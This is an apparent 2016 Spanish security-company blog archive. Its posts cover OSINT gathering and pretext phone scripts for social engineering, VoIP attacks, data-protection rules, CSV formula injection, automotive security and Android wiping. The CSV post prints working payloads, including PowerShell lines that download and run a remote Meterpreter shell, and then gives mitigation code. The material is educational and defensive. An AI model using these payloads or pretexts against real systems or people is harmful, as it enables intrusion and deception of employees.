Month: August 2016

¿CÓMO OBTENER INFORMACIÓN PARA EL ATAQUE DE INGENIERÍA SOCIAL?

Posted on

La ingeniería social es la práctica del uso de medios no técnicos, por lo general la comunicación a través del teléfono u otro medio, para atacar un objetivo. La ingeniería social no puede sonar eficaz y lo que esperamos demostrar en este artículo es que es extremadamente eficaz como método de ataque y que las empresas deben tomar esta forma de ataque tan seriamente como cualquier otro método de ataque según expertos de IICS una empresa de seguridad de la información.

Hay dos fases principales de un ataque de ingeniería social (SE) acuerdo a curso de seguridad de la información. La primera fase es la reconnaissance phase, donde la SE reunirá información de inteligencia sobre su objetivo. Esto les ayuda a infundir confianza en su objetivo de que la SE es quien dice ser y el objetivo se confiara en la SE. La segunda fase es la fase de ataque en el que la SE llamará al destino y comenzara el ataque.

RECONNAISSANCE – OPEN SOURCE INTELLIGENCE (OSINT)

Durante la fase de reconnaissance, la SE reunirá toda la información sobre su objetivo como sea posible. La siguiente es una lista de algunas de las herramientas utilizadas por los expertos de International Institute of Cyber Security iicybersecurity, una  empresa de seguridad de la información :

  • Google – Buscar en Google la empresa, buscando en el directorio de empleados, buscar en Google los nombres de los empleados y excavar de forma gradual saca una montaña de información.
  • Maltego – Maltego se hace por Paterva y es una poderosa herramienta para recopilar, combinar y analizar OSINT sobre un objetivo. Es una excelente plataforma para reunir y analizar OSINT según profesor de curso de seguridad de la información
  • Whois – Whois te dirá quién es dueño de un dominio. Si una empresa está en la mira, el administrador del dominio de la empresa frecuentemente aparece con su número de teléfono o un número para el departamento de TI.
  • Twitter, Facebook, LinkedIn, FriendFinder y otros sitios sociales o sitios con perfiles públicos pueden revelar una gran cantidad de conocimientos acerca de un individuo o una empresa. Los empleados de la compañía pueden revelar detalles acerca de la estructura de empresa, horarios, nombres de compañeros, explican expertos de empresa de seguridad de la información.
  • Google – Esto es lo primero que enseñan en un curso de seguridad de la información. Una característica poco conocida de imágenes de Google es la capacidad de rastrear una foto de perfil en una búsqueda de Google imágenes. Si usted puede encontrar una foto de perfil pública para un individuo, trate de rastrear en búsqueda de imágenes de Google.
  • PiPl.com – Este servicio puede ser un poco atemorizante. Trate de buscar su propio nombre con o sin su ubicación. A continuación, haga clic en el resultado de que es usted. Usted se sorprenderá de la cantidad de datos manejados por pipl.com.
  • Shodan – Shodan es un increíblemente potente motor de búsqueda de la red. Se va alrededor de la indexación qué los servicios que están escuchando en los puertos de red. Se puede proporcionar, por ejemplo, una lista de los routers Cisco de escucha en un puerto en particular de rango de direcciones IP de una empresa.
  • TinEye – Acuerdo a curso de seguridad de la información es una búsqueda de la imagen inversa que también es útil para buscar fotos de perfil que coincidan con una foto existente. Revela perfiles de usuarios alrededor de la red.
  • Archive.org – También se llama WayBackMachine, es una de herramientas favoritas de empresas de seguridad de la información. Esto le permite ver las versiones anteriores de una página web, a menudo se remonta a varios años. Esto puede proporcionar nombres de los empleados anteriores que ya no está con la empresa, o la inteligencia en las actualizaciones de sitio y los cambios.
  • Monster.com, GlassDoor, Indeedy otros sitios web relacionados con el empleo pueden proporcionar una gran cantidad de información en sus descripciones de trabajo. Usted puede aprender sobre qué hardware y software una empresa está utilizando, qué nivel de autorización de seguridad de la información los empleados tienen y más.

Estas son sólo algunas de las herramientas que los ingenieros sociales OSINT utilizan para recopilar datos sobre un objetivo.

EXPLOTACIÓN – LOS ATAQUES DE INGENIERO SOCIAL!

Aquí hay algunos de los tipos de OSINT, un ingeniero social buscará y ilustran cómo se puede utilizar la información:

  • Los nombres de los empleados: “Hola, ¿Puedo hablar con Bob Simmonds?”
  • Sus nombres colega: “Hola Bob, esta es Mary de TI. Acabo de hablar por teléfono con MattSmith “.
  • Lo que sus colegas están haciendo: “Matt está enfermo hoy…”
  • Ubicación de las mesas personales: “. … Pero estoy seguro de que sabes que ya que ustedes comparten un cubículo”
  • Los nuevos despliegues de tecnología en una empresa: “Yo quería saber cómo esa nueva estación de trabajo está trabajando para usted.”
  • ¿Qué tecnología se está utilizando: “Yo sé que Windows 10 no es el favorito de todos, pero espero que la nueva versión de Office te está ayudando”

En este punto, usted está convencido de que podría solamente estar hablando con un empleado de TI interno porque ya sabes mucho. Usted probablemente va a compartir información libremente con esta persona menciona experto de seguridad de la información.

Como se ve, gastando tanto tiempo reuniendo OSINT en una empresa antes de ponerse en contacto con ellos puede hacer un ataque mucho más eficaz. Ataques de ingeniería social son muy eficaces porque los seres humanos (que somos nosotros) suelen ser el eslabón más débil y más aprovechable en una red segura. Es evidente la importancia de desarrollar políticas y procedimientos de la organización con ayuda de expertos de empresa de seguridad de la información y tomar curso de seguridad de la información para protegerse de este tipo de ataque.

DIFERENTES FORMAS DE ATACAR Y ASEGURAR LAS REDES TELEFÓNICAS DE VOIP

Posted on

Las redes VoIP son vulnerables a muchas formas de ataques comunes en las redes y los dispositivos compatibles con estas infraestructuras también son vulnerables a problemas similares. Incluso si se toman todas las precauciones de seguridad en redes informáticas, el servidor sigue siendo susceptible a ataques. La seguridad en redes informáticas está siempre en una batalla con la conveniencia. Soluciones de seguridad en redes informáticas como escaneo de vulnerabilidades y otros que hacen que los sistemas sean más seguros también los hacen menos convenientes. Esperamos que este post te vaya a ayudar a darle sentido a prevenir la mayoría de los ataques y mitigar la pérdida si por alguna razón, tu seguridad falla.

AQUÍ HAY DIFERENTES MANERAS DE HACER EL ATAQUE DE VOIP:

SIP Escaneo y fuerza bruta – las violaciones de SIP escaneo y fuerza bruta se producen cuando los objetivos SIP usando INVITE, REGISTER y OPTIONS, señalan mensajes para enumerar los nombres de usuario SIP válidos con el objetivo de secuestrar ese dispositivo.

 

Los ataques TFTP – Los sistemas de infraestructura son la columna vertebral de la comunicación de voz. Estos aparatos, ya sea hardware o software, pueden ser atacados al igual que cualquier otra tecnología de TCP / IP puede ser atacada. Por ejemplo, un vulnerable router de Cisco corriendo TFTP no es muy diferente que un teléfono Cisco IP corriendo TFTP. Ambos dispositivos son vulnerables a todos los ataques contra seguridad en redes informáticas que caen bajo el ataque de TFTP.

Vulnerabilidades del teléfono – La vulnerabilidad del teléfono sigue siendo una de las maneras más fáciles para los estafadores para obtener acceso a su red, pero también es una de las contramedidas más fáciles utilizadas también. Independientemente de su fabricante del teléfono, cualquier tipo de teléfono viene con problemas de seguridad en redes informáticas. Un problema de seguridad es cuando el nombre de usuario y contraseña por defecto de fábrica no se cambian. Esta es la forma más sencilla para los estafadores para obtener de forma anónima el acceso a la red según escaneo de vulnerabilidades.

 

Ataques de señalización – Session Initiation Protocol (SIP) se ha convertido en el protocolo de control de llamadas para las redes VoIP, debido a su naturaleza abierta y extensible. Sin embargo, la integridad de la señalización entre los sitios de llamadas es de suma importancia y SIP es vulnerable a los atacantes cuando se deja sin seguridad en redes informáticas. Secure SIP es un mecanismo de seguridad definido por el RFC 3261 SIP para enviar mensajes SIP a través de un canal cifrado. Los administradores de red no se ven en la implementación de esta tecnología dentro de sus redes basadas en SIP y no hacen escaneo de vulnerabilidades por lo tanto seguirá siendo insegura.

 

Vulnerabilidades de la interfaz web PBX – Otras áreas que desearas bloquear son PBX y las interfaces de administración, así como acceso a una consola. Interfaces administrativas (tales como Webmin o FreePBX / Trixbox GUI), así como el acceso directo de shell (SSH o Telnet) son agujeros de seguridad en redes informáticas. La forma más fácil de manejar la seguridad en redes informáticas es bloquear todos y cada uno fuera el tráfico para llegar a ellos. Ya sea a través de firewall/ ACL depende de ti. Como mínimo, se debe bloquear todo excepto las direcciones IP específicas con las que manejes el sistema con frecuencia desde en una “lista de permitidos.” Independientemente de si está o no está bloqueando estas interfaces, también debe tener un nombre de usuario / contraseña segura para todo según expertos de escaneo de vulnerabilidades quien trabajan en International Institute of Cyber Security IICS.

 

User Extensions – Una de las formas más comunes de irrumpir en un interruptor es también el más simple; es decir, atacando una user Extensions en el sistema telefónico. El ‘hacker consigue de alguna manera el nombre de usuario y la contraseña de un user/extension del interruptor y comienza a enviar tráfico. La causa raíz más frecuente son contraseñas inseguras. La gran cosa acerca de las contraseñas de usuario SIP es que usted realmente debe sólo tiene que escribirla una vez (durante la configuración del cliente). Lo mejor que puede hacer es utilizar un generador de contraseñas al azar en línea o hacer escaneo de vulnerabilidades regularmente. El uso de las contraseñas generadas aleatoriamente disminuye en gran medida la posibilidad de que la contraseña sea “adivinada” ya sea por un ataque de fuerza bruta o posible ataque de ingeniería social.
Hay algunos programas de escaneo de vulnerabilidades y sitios con programas que permiten poner a prueba su seguridad en redes informáticas y los servidores SIP disponibles en Internet. Estos pueden ayudarle a encontrar exactamente dónde eres más vulnerable y ayudar a dirigir su atención cuando se trata de proteger la red.

Una vez que se establece seguridad en redes informáticas, saber lo que está pasando en tu red es la siguiente gran parte de la batalla. Por lo menos, los informes diarios sobre el uso te darán una idea de lo que está pasando y te ahorrará muchos dolores de cabeza en el futuro. Este informe de escaneo de vulnerabilidades no tiene que ser granular, pero puede ser un panorama que te guiará en la comprensión de tus vulnerabilidades de seguridad en redes informáticas. La seguridad de VoIP definitivamente debe tener un enfoque proactivo para tener éxito.

DIEZ REGLAS PARA LA PROTECCIÓN DE DATOS PERSONALES

Posted on

Seguridad de datos personales es un tema muy importante para empresas. Las empresas siempre deben seguir reglas básicas para seguridad de datos personales.

1. CONSENTIMIENTO

Siempre que sea posible obtener el consentimiento antes de la adquisición, posesión o el uso de datos personales. Según reglas de protección de datos personales, cualquier formulario, ya sea en papel o basado en web, quienes están diseñados para recopilar datos personales deben contener una declaración explicando qué es la información que se utilizará para y quién puede ser revelada.

2. DATOS CONFIDENCIALES

Tenga especial cuidado con los datos personales confidenciales (es decir, información relacionada con la raza, opinión política, la salud física o mental, las creencias religiosas, afiliación sindical, la sexualidad, delitos, etc.). Acuerdo a recomendaciones de empresa de adaptación LOPD International Institute of Cyber Security IICS, dicha información sólo debe mantenerse y utilizarse cuando sea estrictamente necesario. Siempre obtener el consentimiento de la persona en cuestión y notificarles de que existe uso probable (s) de estos datos.

3. LOS DERECHOS INDIVIDUALES

Siempre que sea posible se abierto con las personas en relación con la información que se llevan a cabo sobre ellos para asegurar protección de datos personales. En la preparación de informes o de agregar notas a los documentos oficiales, tenga en cuenta que los individuos tienen el derecho de ver todos los datos personales y por lo tanto podrían leer los comentarios ‘informales’ hechos por ellos. También tenga en cuenta que esto incluye los correos electrónicos que contienen datos de carácter personal y así mismo se debe tener precaución cuando se envían correos electrónicos.

4. LOS ARCHIVOS DE REVISIÓN

Sólo crear y conservar los datos personales cuando sea absolutamente necesario ya que seguridad de datos personales es muy importante. De forma segura disponer o eliminar cualquier dato personal que no esté actualizado, irrelevantes o que no necesite. Acuerdo a recomendaciones deempresa de adaptación LOPD deben realizar exámenes regulares de los archivos y desechar los datos innecesarios u obsoletos de forma sistemática.

5. ELIMINACIÓN DE LOS REGISTROS

Para mantener seguridad de dataos personales, cuando se deshaga de los registros en papel que contienen datos personales, tratarlos con confidencialidad (es decir desmenuza este tipo de archivos en lugar de disponer de ellos como papel de desecho). Del mismo modo cualquiera innecesario o fuera de la fecha de los documentos electrónicos deben suprimirse. Otro punto muy crítico para protección de datos personales es que los equipos de negocios no deben ser regalados o vendidos a menos que los servicios de información se han asegurado de que toda la información almacenada en él se ha eliminado o borrado.

6. PRECISIÓN

Mantenga todos los datos personales actualizados y precisos. Tenga en cuenta los cambios de dirección y otras modificaciones. Si hay alguna duda sobre la exactitud de los datos personales, entonces no deberían ser utilizados explica experto de una empresa de adaptación LOPD.

7. SEGURIDAD

Mantenga todos los datos personales de forma segura como sea posible (por ejemplo, en archivadores con llave o en habitaciones que se puede bloquear cuando estén desocupadas). Para mantener seguridad de dataos personales, no deje los registros que contengan datos de carácter personal sin vigilancia en oficinas o áreas accesibles a los miembros del público. Asegúrese de que los datos personales no se muestran en las pantallas de los ordenadores visibles para los transeúntes. Tenga en cuenta que estas consideraciones de seguridad también se aplican a los registros tomados fuera de la empresa, por ejemplo, para el trabajo en casa o para una reunión fuera. También tener en cuenta que el correo electrónico no es necesariamente confidencial para protección de datos personales o asegurar así que no debe ser utilizado para las comunicaciones potencialmente sensibles.

8. LA REVELACIÓN DE DATOS

Nunca revele datos personales a terceros sin el consentimiento de la justificación razonable de otro individuo explica experto de una empresa de adaptación LOPD. Esto incluye los padres, tutores, familiares y amigos de los datos del sujeto quienes no tienen derecho a acceder a la información sin el consentimiento del interesado. Los datos personales sólo pueden comunicarse legítimamente a terceros para fines relacionados y para cumplir con los requisitos legales de protección de datos personales, pero sólo en los que se conforman con las solicitudes de información de identidad ‘y la legitimidad de la solicitud.

Las solicitudes de información personal se reciben de vez en cuando de organizaciones tales como la policía y el gobierno. Las empresas deben esforzarse por cooperar con estas organizaciones, pero los primeros pasos se deben tomar son asegurarse de que las solicitudes son genuinas y legítimas.

9. TRANSFERENCIA DE TODO EL MUNDO

Siempre debes obtener el consentimiento de la persona de que se trate antes de colocar la información sobre ellos en Internet (aparte de los detalles básicos del contacto de oficina) y antes de enviar cualquier información personal fuera del país acuerdo a recomendaciones de iicybersecurity, una empresa de adaptación LOPD.

10. PROCESADORES TERCEROS

Tenga en cuenta que si está utilizando un procesador de datos, por ejemplo, a un tercer partido para gestión de base de datos y se les da acceso a los datos personales, entonces usted debe tener un contrato escrito en marcha con ellos para garantizar que ellos tratan a dicha información con confidencialidad, tienen medidas de seguridad de datos personales y en cumplimiento de la ley de protección de datos personales.

Podrían aprender más sobre protección de datos personales, medidas de seguridad de datos personales con ayuda de expertos de empresas de adaptación LOPD.

¿CÓMO MITIGAR UN ATAQUE DE INYECCIÓN CSV?

Posted on

Los expertos de seguridad web mencionan que un atacante puede explotar esta funcionalidad mediante la inserción de caracteres arbitrarios en formas que sean exportables (sea esto a través de un análisis, contactos u otras funcionalidades). Permitiendo en consecuencia, a dicho atacante pueda formular una carga útil de ataque que se ejecuta cuando dicho archivo CSV se descarga y podría romper seguridad perimetral.

El escenario de este ataque se dirige  puramente al usuario (s) que descarga el archivo CSV, naturalmente, este ataque de seguridad web se suele descartar como un problema sin embargo sitios web todavía deben estar al tanto de la información que están exportando porque puede ser potencialmente perjudicial para seguridad perimetral de los usuarios.

El playload más común visto es similar a la que se muestra a continuación:

=cmd|’ /C calc’!A0

Esta cadena en su núcleo, le está diciendo esencialmente al programa que está abierto con el programa que le gustaría ejecutar cmd.exe con las siguientes banderas /C calc que a su vez pondrán en marcha calc.exe desde la línea de comandos.

Para formular un payload meterpreter en la víctima, hemos adaptado una cadena de payload para que sea más corto y más fácil de inyectar, como resultado, el siguiente payload se puede utilizar

=cmd|'/C powershell IEX(wget 0r.pe/p)'!A0

Donde en este caso url cortado 0r.pe es utilizado para entregar el payload para no ser detectado por seguridad perimetral(Invoke-Shellcode) que es una función de Powersploit para permitir la entrega de meterpreteshells. Para acortar el payload aún más la siguiente cadena también se puede utilizar, que corta la necesidad de la cadena de cmd.

=powershell|'IEX(wget 0r.pe/p)'!A0

Esto directamente lanzará PowerShell desde la célula afectada en editor de hojas de cálculo de su elección. Estos payloads están todos muy bien y bien sin embargo, la  mayoría de las veces que no he estado viendo el = carácter está siendo filtrado hacia fuera menciona experto de seguridad web.

Sin embargo, utilizando el conocimiento personal Microsoft Excel y seguridad web, también es posible intact el payload usando otras combinaciones de caracteres tales como @, + o – en una variedad de diferentes combinaciones.

@SUM(1+1)*cmd|’ /C calc’!A0

O para cuantificar el peligro:

@SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0

Una vez dicho todo esto y hablado de los diversos payloads hay pasos de mitigación que se pueden tomar para eliminar más o menos la amenaza de secuencias de comandos PowerShell que infestan el sistema de un usuario con shells acuerdo a los expertos de seguridad web.

PASOS PARA LA MITIGACIÓN

Las medidas recomendadas para remediar este problema de seguridad web se han descrito anteriormente sería asegurar que las formulario que se pueden exportar si contengan únicamente caracteres alfanuméricos y no puedan ser modificados para añadir caracteres arbitrarios.

También se debe considerar que todas las entradas de los usuarios no pueden  ser de confianza y como resultado cualquier salida debe ser codificada. La salida de esta funcionalidad se debe asumir como texto y no fórmulas. Lo que podrían adoptarse medidas para designar fácilmente como tal al colocar las cotizaciones en todo el texto o la aplicación de características de escape como se describe y se demuestra a continuación según curso de seguridad perimetral.

El problema con los vectores de inyección CSV discutidos arriba no tiene en realidad que ver con el carácter @, o =, +, -. El problema radica en el carácter pipe (|), el cual Excel y otras aplicaciones interpretan para ejecutar comandos {arbitrarios} y windows lanza binarios. De la lectura de los ataques de seguridad web y la investigación de las posibles técnicas de mitigación con ayuda de expertos de seguridad perimetral que la mejor solución es escapar del carácter pipe en este escenario de ataque es poner un prefijo \ antes del pipe. Esto se debe a que  Excel y otros programas que buscan un ejecutable llamado  cmd.exe o powershell.exe sin embargo, cuando añadiendo un \ dentro de la trayectoria evitará el lanzamiento de exe.

Además también hemos escrito un script en Python para escapar de archivos CSV que se pueden ver a continuación, es una prueba rápida del concepto sin embargo se puede adaptar fácilmente:

def escape(payload):   

           if payload[0] in (‘@’,’+’,’-‘, ‘=’, ‘|’):           

                payload = payload.replace(“|”, “\|”)            

               payload = “‘” + payload + “‘”    

            return payload 

# An example of payload string payload

= “@cmd|’ /C calc’!A0”

print “The Unescaped version is: ” + payload

print “When passed though escape function the value is: ” +

escape(payload)

En el código anterior se puede observar que si una cadena de payload contiene cualquiera de los caracteres en la lista negra se han evitado el ataque, esto se demuestra en la salida del script:

root@zsec:# python escape_csv.py

El version Unescaped es:

“@cmd|’ /C calc’!A0”

When passed though escape function the value is: ‘@cmd\|’ /C calc’!A0′

Note que desde la salida se puede ver que la versión escapada tiene un conjunto de’ alrededor de la cadena de usuario y el carácter pipe también se ha escapado. Cabe señalar que los problemas descritos anteriormente son sólo un tipo de ataque de inyección CSV, esta mitigación no cubre los ataques sobre seguridad web que se pueden llevar a cabo utilizando la misma técnica pero con diferentes payloads.

MEJORES PRÁCTICAS DE CIBERSEGURIDAD PARA LA INDUSTRIA AUTOMOTRIZ

Posted on

Hay diferentes áreas donde empresas de industria automotriz debe enfocar para no tener problemas con ciberseguridad. Este artículo explica las mejores prácticas en diferente área para la industria automotriz

GOBERNACIÓN

La gobernación efectiva se alinea a un programa de soluciones de ciberseguridad de vehículos con la misión y objetivos de una organización. Por otro lado, un sólido gobernación puede ayudar a fomentar y mantener una cultura de ciberseguridad. Las mejores prácticas no dictan un modelo particular de gobernación de soluciones de ciberseguridad de vehículos, pero proporcionan consideraciones para el diseño para alinear las funciones y responsabilidades funcionales. Mejores prácticas para la gobernación incluyen:

  • Definir la supervisión ejecutiva de la seguridad del producto con ayuda de empresa de ciberseguridad.
  • Alinear la empresa para abordar la ciberseguridad de vehículos, con funciones y responsabilidades definidas en el conjunto de la organización con ayuda de servicios de ciberseguridad.
  • Comunicar la responsabilidad de supervisar los servicios de ciberseguridad a todos los grupos de interés internos apropiados.
  • Dedicar recursos adecuados para las actividades y curso de ciberseguridad en toda la empresa.
  • Establecer procesos de gobernación para garantizar el cumplimiento de las regulaciones, políticas internas, y los compromisos externos.

car-hacking-623x425

EVALUACIÓN Y GESTIÓN DE RIESGOS

Evaluación del riesgo y estrategias de gestión para mitigar el impacto potencial de las vulnerabilidades de la ciberseguridad. Según expertos de soluciones de ciberseguridad, las mejores prácticas se centran en los procesos de identificación, categorización, priorización y el tratamiento de los riesgos de ciberseguridad que podrían llegar a problemas de seguridad y protección de datos. Los procesos de gestión de riesgos y servicios de ciberseguridad pueden ayudar a los fabricantes de automóviles a identificar y proteger los bienes críticos, ayudar en el desarrollo de medidas de protección, y apoyar las decisiones de riesgo operacional. Acuerdo acurso de ciberseguridad, mejores prácticas para la evaluación y gestión de riesgos incluyen:

  • Con ayuda de una empresa de ciberseguridad, establecer procesos estandarizados para identificar, medir, y dar prioridad a las fuentes de riesgo de ciberseguridad.
  • Establecer un proceso de decisión para gestionar los riesgos identificados.
  • Documentar de un proceso para informar y comunicar los riesgos a las partes interesadas apropiadas.
  • Monitorear y evaluar los cambios en los riesgos identificados como parte de un circuito de retroalimentación de evaluación de riesgos.
  • Incluir la cadena de suministro en las evaluaciones de riesgo y servicios de ciberseguridad.
  • Establecer un proceso para confirmar el cumplimiento de los proveedores críticos para verificar los requisitos de ciberseguridad, líneas de guía y curso de ciberseguridad.
  • Incluir una evaluación de riesgos en la etapa inicial de desarrollo del vehículo, y volver a evaluar en cada etapa del ciclo de vida del vehículo; explican maestros de iicybersecurity, una escuela de ciberseguridad.

SEGURIDAD EN DISEÑO

El diseño del vehículo seguro consiste en la integración de los recursos de hardware y soluciones de de ciberseguridad durante el proceso de desarrollo de productos. Según expertos de empresa de ciberseguridad, las mejores prácticas para la seguridad en diseño incluyen:

  • Considerar los riesgos de ciberseguridad desde el principio y en las etapas clave en el proceso de diseño.
  • Identificar y abordar las amenazas potenciales y objetivos de ataque en el proceso de diseño.
  • Usar servicios de ciberseguridad para considerar y comprender los métodos apropiados de reducción de la superficie de ataque.
  • Aprender implementar capas de defensas de ciberseguridad con curso de ciberseguridad para lograr una defensa en profundidad.
  • Identificar los límites de confianza y protegerlos mediante los controles de seguridad.
  • Incluir las revisiones de diseño de seguridad en el proceso de desarrollo.
  • Implementar las conexiones seguras hacía, desde y dentro del vehículo.
  • Limitar interacciones en la red con ayuda de separación de ambientes.
  • Según profesores de escuela de ciberseguridad es muy importante hacer pruebas de hardware y software para evaluar la integridad del producto y la seguridad como parte de las pruebas de componentes.
  • Tomar ayuda de expertos de una empresa de ciberseguridad para Llevar a cabo las pruebas de vulnerabilidad a nivel de software, incluyendo pruebas de unidad e integración.
  • Probar y validar soluciones de ciberseguridad implementado al nivel del vehículo.
  • Autenticar y validar todas las actualizaciones de software, independientemente del método de actualización.
  • Considere la posibilidad de riesgos contra privacidad de datos de acuerdo con los principios de protección de privacidad del consumidor.

DETECCIÓN DE AMENAZAS Y PROTECCIÓN

Ciberseguridad proactiva a través de la detección de amenazas, vulnerabilidades e incidentes permiten a los fabricantes de automóviles mitigar el riesgo y consecuencias asociadas. Los procesos de detección de amenazas crear conciencia de actividades sospechosas, lo que permite actividades de rehabilitación y recuperación proactivas. Según profesores de escuela de ciberseguridad, las mejores prácticas para la detección de amenazas y protección incluyen:

  • Según curso de ciberseguridad deben evaluar el riesgo y la disposición de las amenazas identificadas y las vulnerabilidades utilizando un proceso definido de conformidad con los procedimientos generales de gestión de riesgos.
  • Informar las decisiones basadas en el riesgo con la supervisión de las amenazas para reducir el riesgo de la empresa entendiendo y anticipando las amenazas actuales y emergentes.
  • Tomar ayuda de empresa de ciberseguridad para identificar las amenazas y vulnerabilidades a través de diversos medios, incluyendo la exploración y análisis de rutina de las áreas de mayor riesgo.
  • Apoyar la detección de anomalías para sistemas de operaciones, servicios de vehículos, y otras funciones conectadas, con consideraciones de privacidad.
  • La organización debe tener proceso para gestiona de la divulgación de vulnerabilidades de partes externas.
  • Usar servicios de ciberseguridad para informar sobre las amenazas y las vulnerabilidades a terceros.

RESPUESTA A INCIDENTES Y RECUPERACIÓN

Un plan de respuesta a incidentes documenta los procesos para informar a una respuesta a incidentes ciberseguridad que afecten el ecosistema del vehículo. Los expertos de soluciones de ciberseguridad mencionan que las mejores prácticas incluyen protocolos para recuperarse de incidentes de  ciberseguridad de una manera fiable y rápida, y la manera de garantizar el mejoramiento del proceso de continuo. Según empresa de ciberseguridad, las mejores prácticas para la respuesta a incidentes y recuperación incluyen:

  • Documentar el ciclo de vida de respuesta a incidentes, desde la identificación y contención a través de la rehabilitación y la recuperación.
  • Asegurar que un equipo de respuesta de incidentes este en su lugar para coordinar una respuesta de toda la empresa a un incidente cibernético al vehículo.
  • Mantener actualizado con curso de ciberseguridad y realizar pruebas y simulaciones de incidentes periódicamente para promover la preparación del equipo de respuesta a incidentes.
  • Tomar ayuda de servicios de ciberseguridad para identificar y validar en qué parte del vehículo un incidente se originó.
  • Determinar el impacto real y potencial de incidente cibernético al armada del vehículo.
  • Contener un incidente para eliminar o disminuir su gravedad.
  • Promover medidas oportunas y apropiadas para remediar un incidente cibernético vehículo.
  • Notificar a los interesados internos y externos de un incidente cibernético del vehículo.
  • Según profesores de escuela de ciberseguridad, mejorar los planes de respuesta a incidentes en el tiempo sobre la base de las lecciones aprendidas es muy importante.

FORMACIÓN Y SENSIBILIZACIÓN

Los programas de una escuela de ciberseguridad y curso de ciberseguridad ayudan a cultivar una cultura de seguridad y hacer cumplir las responsabilidades de seguridad cibernética del vehículo. Según empresa de ciberseguridad, las mejores prácticas deben incluir los programas de formación y de sensibilización en toda la organización para fortalecer el entendimiento de las partes interesadas de los riesgos de ciberseguridad. Según expertos de soluciones de ciberseguridad, las mejores prácticas de formación y sensibilización incluyen:

  • Establecer programas de curso de ciberseguridad para los interesados internos en todo el ecosistema del vehículo.
  • Incluir servicios de ciberseguridad y la conciencia de ciberseguridad específica para el vehículo.
  • Educar a los empleados en la conciencia de la ciberseguridad, las funciones y responsabilidades con ayuda de una escuela de ciberseguridad.

 

LA COLABORACIÓN CON TERCEROS

La defensa contra los ataques cibernéticos a menudo requiere de la colaboración entre múltiples partes interesadas para mejorar la conciencia sobre las amenazas cibernéticas, servicios de ciberseguridad y la respuesta a ataque cibernético. Según expertos de servicios de ciberseguridad, las mejores prácticas para la colaboración y el compromiso con Terceros incluyen:

  • Revisar la información y los datos mediante un proceso de clasificación estandarizado antes de la cesión a terceros.
  • Interactuar con organismos de la industria, tales como empresa de ciberseguridad, Auto-ISAC, Auto Alliance, los fabricantes de automóviles globales, y otros.
  • Interactuar con los organismos gubernamentales, incluyendo el National Highway Traffic Safety Administration, NIST, Department of Homeland Security, United States Computer Emergency Readiness Team, Federal Bureau of Investigation y otros.
  • Participar con las instituciones académicas como International Institute of Cyber Security,una escuela de ciberseguridad y los investigadores de soluciones de ciberseguridad, que sirven como un recurso adicional en la identificación y mitigación de amenazas.
  • Formar alianzas y acuerdos de colaboración para mejorar la ciberseguridad del vehículo.

¿CÓMO LIMPIAR UN TELÉFONO ANDROID COMPLETAMENTE?

Posted on Updated on

La opción “Restablecer configuración de fábrica” de Android es perfecta para usarse cuando usted está teniendo problemas con el teléfono o simplemente quiere un teléfono completamente limpio para empezar de nuevo. Sin embargo, uno de sus principales usos es borrado seguro de datos para protección de datos personales antes de deshacerse de su teléfono, ya sea para venderlo, dárselo a alguien o simplemente tirarlo a la basura.

EL RESTABLECIMIENTO DE FÁBRICA NO ELIMINA TODOS LOS DATOS

Uno podría pensar que toda la información personal se elimina por completo y está segura ante los ojos de otras personas. Pero ese no es el caso, algunos de los datos, incluyendo información personal, sigue siendo accesible en el almacenamiento local, incluso después de la reiniciación de fábrica acuerdo a expertos de servicios de protección de datos.

Cuando restauras de fábrica tu teléfono Android. Dicha información es en realidad “marcado como eliminado” y oculto por lo que no se puede ver a simple vista. Que incluso tus fotos, correos electrónicos, textos y contactos, etc y hace borrado seguro de datos.

Según expertos de protección de datos personales, todos los datos están presentes en la memoria del teléfono y se puede recuperar fácilmente utilizando una herramienta gratuita de recuperación de datos, tales como FKT Imager. Si usted acaba de hacer un simple reinicio de fábrica y alguien pone sus manos en su teléfono, ellos podrán recuperar fácilmente la mayor parte de su información personal con el uso de una herramienta de este tipo de recuperación de datos.

CntTpXgUkAABCRN

¿POR QUÉ EL REINICIO DE FÁBRICA DEJA DATOS?

Ahora, usted debe estar pensando que ¿por qué ocurre esto? Y porque no hace borrado seguro de datos en realidad. Actualmente esto toma espacio en la memoria, pero esto no se le muestra a usted y al empezar a utilizar el teléfono de nuevo, estos datos se sobrescriben.

En un momento en que los discos duros eran muy lentos, los fabricantes de sistemas operativos encontraron que era mucho mejor marcar el espacio como libre en lugar de realmente (física) eliminar el contenido menciona experto de servicios de protección de datos.

Con el tiempo, el nuevo contenido se escribiría, por lo que parecía innecesario para escribir ceros o números aleatorios en la parte superior de la misma. Esto también evita el desgaste de la memoria Flash, que tiene un número limitado de operaciones de escritura en su vida útil. Es una buena práctica, pero supone que usted cuenta todavía con control de su dispositivo. Además, esto le da la oportunidad de recuperar los datos eliminados cuando no hace borrado seguro de datos.

Sin embargo, si desea eliminar por completo su teléfono Android a continuación, la respuesta a este problema es realmente simple, todo lo que necesita hacer es cifrar los datos del teléfono antes de reiniciarlo de fábrica. Siguiendo estos sencillos pasos, usted será capaz asegurar protección de datos personales.

CIFRAR SU TELÉFONO ANTES DE BORRAR LOS DATOS

PASO 1: CIFRAR EL TELÉFONO

Al cifrar todos los datos del teléfono antes de reiniciar de fábrica el teléfono, serán revueltos todos sus datos. Incluso si un experto de servicios de protección de datos quiere recuperar los datos utilizando cualquiera de las herramientas de recuperación de datos, ellos tendrán que proporcionar una clave específica para descifrar los datos en primer lugar.

Para cifrar los datos sólo tiene que ir a:

Configuración y pulse en Seguridad

limpiar-telefono-android

En Seguridad, verá la opción de dispositivo de cifrado (en algunos teléfonos se Cifrar teléfono) pulsa sobre él, y en la página siguiente puedes simplemente pulsar en Configurar el tipo de bloqueo de pantalla para activar el bloqueo.

limpiar-telefono-android-1

Todo el proceso puede tardar hasta una hora, así que asegúrese de que su teléfono esté cargado lo suficiente y no se tenga que utilizar su teléfono durante al menos una hora.

PASO 2: RESTABLECER CONFIGURACIÓN DE FÁBRICA DE TU TELÉFONO

Una vez cifrados los datos del teléfono, se puede con seguridad restablecer de fábrica su teléfono. Para restablecer de fábrica su teléfono, vaya a:

Ajustes y toque en Copia de seguridad y restablecimiento bajo el título “personal”.

The whole process can take up to an hour, so make sure your phone is charged enough and you don’t need to use your phone for at least an hour.

limpiar-telefono-android-2

Al final, verá la opción de Restablecer datos de fábrica, pulse en él y en la página siguiente pulse en Reiniciar teléfono al final de la pantalla.

limpiar-telefono-android-3

